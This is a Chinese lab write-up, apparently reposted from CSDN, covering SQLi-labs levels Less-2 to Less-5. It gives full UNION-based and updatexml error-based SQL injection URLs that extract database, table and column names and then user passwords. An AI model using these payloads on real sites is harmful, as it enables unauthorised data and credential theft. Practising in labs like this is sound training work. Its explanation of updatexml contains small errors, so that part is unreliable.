当前位置: 首页> 游戏> 手游 > SQL labs-SQL注入(二)

SQL labs-SQL注入(二)

时间:2025/7/14 22:05:27来源:https://blog.csdn.net/2302_80280669/article/details/140620972 浏览次数:0次

环境搭建参考

SQL注入(一)

一,SQL labs-less2。

http://192.168.61.206:8001/Less-2/?id=-1 union select 1,2,group_concat(username , password) from users--+

与第一关没什么太大的不同,唯一区别就是闭合方式为数字型。

二,SQL labs-less3。

直接输入:

http://172.168.10.129:8001/Less-3/?id=1\

得到闭合符,其余步骤与less1,less2一致。

less4解题思路与3一致,在此不做赘述。

三,报错注入。

1,先找出闭合符。

2,报错注入,得到库名。


http://172.168.10.129:8001/Less-5/?id=1'and updatexml(1,concat(%2f,(select database()),%2f),1)--+

updatexml():括号内写目标文件,文件路径,修改内容。

ox3e:是“>”的16进制编码。

concat()  拼接输出。

3,以此类推,得到表名。

http://172.168.10.129:8001/Less-5/?id=1' and updatexml(1,concat(0x3e,(select group_concat(table_name)from information_schema.tables where table_schema='security'),0x3e),1)--+

4,得到敏感表名内部的字段名。

http://172.168.10.129:8001/Less-5/?id=1' and updatexml(1,concat(0x3e,(select group_concat(column_name)from information_schema.columns where table_schema='security' and table_name ='users'),0x3e),1)--+

5,得到敏感数据。

http://172.168.10.129:8001/Less-5/?id=1'and updatexml(1,concat(0x3e,(select group_concat(password)from users),0x3e),1)--+

关键字:SQL labs-SQL注入(二)

版权声明:

本网仅为发布的内容提供存储空间,不对发表、转载的内容提供任何形式的保证。凡本网注明“来源:XXX网络”的作品,均转载自其它媒体,著作权归作者所有,商业转载请联系作者获得授权,非商业转载请注明出处。

我们尊重并感谢每一位作者,均已注明文章来源和作者。如因作品内容、版权或其它问题,请及时与我们联系,联系邮箱:809451989@qq.com,投稿邮箱:809451989@qq.com

责任编辑: